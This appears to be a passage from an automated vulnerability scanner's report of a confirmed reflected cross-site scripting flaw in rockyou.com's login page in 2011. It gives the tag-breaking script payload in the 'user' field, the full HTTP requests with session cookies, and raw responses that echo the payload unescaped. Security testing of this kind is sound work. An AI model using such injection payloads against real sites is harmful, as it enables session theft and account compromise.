value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916&q..
Date: Mon, 18 Apr 2011 22:04:20 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=-1; expires=Mon, 18-Apr-2011 12:04:20 GMT; path=/; domain=.rockyou.com,lastlogin=1303164260; expires=Wed, 27-Jul-2011 22:04:20 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:04:20 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:04:20 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:04:20 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=98624 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9120
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="\'\"--></style></script><script>netsparker(0x000BD2)</script>"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="3"><br /><input type="hidden" name="user" id="user" value="\'\"--></style></script><script>netsparker(0x000BD2)</script>"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916&q..
|
- /login.php
/login.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| birthyear | GET | 3 |
| country | GET | 0 |
| flixster | GET | 3 |
| mode | GET | create |
| pass | GET | 3 |
| postalcode | GET | 3 |
| sex | GET | 3 |
| source | GET | 3 |
| toscheck | GET | 1 |
| user | GET | 3 |
| pass | POST | 3 |
| user | POST | '"--></style></script><script>alert(0x000BD3)</script> |
| mode | POST | create |
| source | POST | 3 |
| flixster | POST | 3 |
| toscheck | POST | 1 |
| birthyear | POST | 3 |
| sex | POST | 3 |
| country | POST | 0 |
| postalcode | POST | 3 |
Request
POST /login.php?birthyear=3&country=0&flixster=3&mode=create&pass=3&postalcode=3&sex=3&source=3&toscheck=1&user=3 HTTP/1.1
Referer: http://www.rockyou.com/login.php?birthyear=&country=0&flixster=&mode=create&pass=&postalcode=&sex=&source=&toscheck=1&user=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164260; ctid=1; sns_type=facebook.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 181
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
pass=3&user='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000BD3)%3c%2fscript%3e&mode=create&source=3&flixster=3&toscheck=1&birthyear=3&sex=3&country=0&postalcode=3
Referer: http://www.rockyou.com/login.php?birthyear=&country=0&flixster=&mode=create&pass=&postalcode=&sex=&source=&toscheck=1&user=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164260; ctid=1; sns_type=facebook.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 181
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
pass=3&user='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000BD3)%3c%2fscript%3e&mode=create&source=3&flixster=3&toscheck=1&birthyear=3&sex=3&country=0&postalcode=3
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:04:21 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:04:20 GMT; path=/; domain=.rockyou.com,lastlogin=1303164261; expires=Wed, 27-Jul-2011 22:04:21 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:04:21 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:04:21 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:04:21 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=86291 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9147
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="\'\"--></style></script><script>netsparker(0x000BD3)</script>"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:block"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="3"><br /><input type="hidden" name="user" id="user" value="\'\"--></style></script><script>netsparker(0x000BD3)</script>"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="..
Date: Mon, 18 Apr 2011 22:04:21 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:04:20 GMT; path=/; domain=.rockyou.com,lastlogin=1303164261; expires=Wed, 27-Jul-2011 22:04:21 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:04:21 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:04:21 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:04:21 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=86291 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9147
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
